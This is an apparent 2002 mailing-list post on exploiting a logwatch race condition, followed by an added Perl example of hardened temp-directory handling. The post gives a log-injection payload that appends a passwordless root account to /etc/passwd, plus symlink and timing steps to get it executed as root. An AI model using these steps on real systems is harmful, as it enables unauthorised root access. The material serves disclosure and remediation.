From: ano nym (an0nym0uz dbzmail.com)
Date: Sun Apr 07 2002 - 21:50:25 CDT
Here are some of my ideas about exploiting the race condition in logwatch.
logwatch is processing different logfiles - let's take a look at
/var/log/secure. First we need a way to smuggle in a command in it; this is
how I did it:
$ nc 0 22
SSH-1.99-OpenSSH_2.9p2
'& echo hoho::0:0:>>/etc/passwd #
Protocol mismatch.
$ tail -f /var/log/secure
Apr 8 04:37:33 xxxxx sshd[23420]: Bad protocol version identification ''& echo hoho::0:0:>>/etc/passwd #' from 127.0.0.1
Ok, now we got the command we want, how are we going to get this
executed?
----- This is what logwatch does.
Preprocessing LogFile: secure
/bin/cat /var/log/secure 2>/dev/null | /etc/log.d/scripts/shared/applystddate >/tmp/logwatch.2318/secure
DEBUG: Inside ApplyStdDate...
DEBUG: Range: yesterday
DEBUG: Looking For: Apr 6
(the command string should be inserted the day BEFORE, if range is yesterday...)
So, if we create a symlink...
ln -s /etc/log.d/scripts/shared/applystddate secure, for example,
the command will get executed when logwatch calls applystddate next time.
(many other targets exist, for example /root/.bashrc etc...)
We can of course use other logs than secure; for example "messages" and
smuggle in the command using the ftpd etc...
So, what are the problems?:
[code from logwatch]
$TempDir = $Config{'tmpdir'} . "logwatch." . $$ . "/";
if ( -d $TempDir ) {
    rmdir ($TempDir);
}
if ( -e $TempDir ) {
    unlink ($TempDir);
}
#### 1
if ($Config{'debug'}>7) {
    print "\nMaking Temp Dir: " . $TempDir . "\n";
}
mkdir ($TempDir,0700);
[code from logwatch]
We need to create the dir logwatch.PID BEFORE "mkdir ($TempDir,0700);"
and after/before #### 1. If not we will not be able to create a symlink inside
the dir (0700)...
Another nice thing is that we can see when logwatch will be executed,
by looking at /etc/crontab - logwatch is in the dir /etc/cron.daily...
(02 4 * * * root run-parts /etc/cron.daily)
Note, that the system I played with was a DEFAULT installation of
redhat 7.2.
later.
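The quoted logwatch code removes whatever sits at a predictable path and then calls mkdir without checking the result. The following is an added example of a hardened form, not code from logwatch or from the post above. The function names are hypothetical and the demonstration runs in a scratch directory with constructed inputs.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Fcntl qw(:DEFAULT :mode);
use File::Temp qw(tempdir);

# tempdir() picks an unpredictable name and creates it with mode 0700 via
# mkdir(2), which fails if the name exists, so a pre-created directory or
# symlink is never adopted.
sub make_private_dir {
    my ($base) = @_;
    my $dir = tempdir('logwatch.XXXXXXXX', DIR => $base, CLEANUP => 1);
    my @st = lstat($dir) or die "lstat $dir: $!\n";
    die "$dir: not a directory\n"    unless S_ISDIR($st[2]);
    die "$dir: not owned by us\n"    unless $st[4] == $>;
    die "$dir: group/other access\n" if $st[2] & 0077;
    return $dir;
}

# If a PID-based name must be kept, never delete and retry: a failed mkdir
# means someone else already holds that name, so stop.
sub make_named_dir {
    my ($path) = @_;
    mkdir($path, 0700) or die "refusing to use $path: $!\n";
    return $path;
}

# O_CREAT|O_EXCL fails if the name exists, including when it is a symlink,
# so output is never written through a pre-existing link.
sub create_output {
    my ($path) = @_;
    sysopen(my $fh, $path, O_WRONLY | O_CREAT | O_EXCL, 0600)
        or die "refusing to write $path: $!\n";
    return $fh;
}

# Constructed demonstration in a scratch directory (no real logwatch paths).
my $base = tempdir(CLEANUP => 1);
my $work = make_private_dir($base);
print "private dir: $work\n";

# Simulate a directory that already exists under the PID-based name.
mkdir("$base/logwatch.$$", 0777) or die "mkdir: $!\n";
my $dir_ok = eval { make_named_dir("$base/logwatch.$$"); 1 };
print "pre-created dir rejected: ", ($dir_ok ? "no" : "yes"), "\n";

# Simulate a symlink already present where an output file is expected.
symlink("$base/target", "$work/secure") or die "symlink: $!\n";
my $file_ok = eval { create_output("$work/secure"); 1 };
print "existing symlink rejected: ", ($file_ok ? "no" : "yes"), "\n";
```

Both rejection lines print "yes"; the first line shows the randomly named 0700 directory that replaces logwatch.PID.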